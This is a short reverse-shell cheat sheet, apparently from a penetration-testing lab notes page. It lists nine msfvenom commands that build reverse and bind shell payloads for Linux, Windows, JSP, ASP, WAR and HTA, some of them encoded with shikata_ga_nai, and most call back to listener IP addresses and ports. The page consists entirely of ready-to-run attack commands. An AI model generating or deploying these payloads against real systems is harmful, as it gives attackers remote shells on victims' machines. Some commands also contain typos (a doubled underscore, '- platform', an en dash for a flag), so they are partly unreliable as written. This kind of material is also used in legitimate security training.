06 Reverse Shell Cheat Sheet
The syntax of generating reverse TCP shell payload

Using msfvenom

1
msfvenom -p linux/x86/shell/reverse_tcp LHOST=10.11.0.235 LPORT=1234 –e x86/shikata_ga_nai -b "\x00\x0a\x0d" -f js_le>shell
2
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.11.0.235 LPORT=4444 –e x86/shikata_ga_nai -b "\x00\x0a\x0d" -f js_le > shell2
3
msfvenom -p windows/shell_reverse__tcp -f asp LHOST=10.11.0.235 LPORT=443 -o labs/229/shell.asp
4
msfvenom -p windows/shell_bind_tcp -f exe >labs/31/shell.exe
5
msfvenom -p java/jsp_reverse_shell_tcp LHOST={my_IP} LPORT={my_PORT} -f raw > /var/www/html/shell.jsp
6
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.179 LPORT=1234 -f asp -a x86 - platform win -o shell.asp
7
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.6 LPORT=1234 -f war > shell.war
8
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.179 LPORT=1234 -f hta-psh -o exploit.hta
9
msfvenom -p linux/x86/exec CMD=/bin/sh -f elf -o scp
Copied!
Last modified 1yr ago
Copy link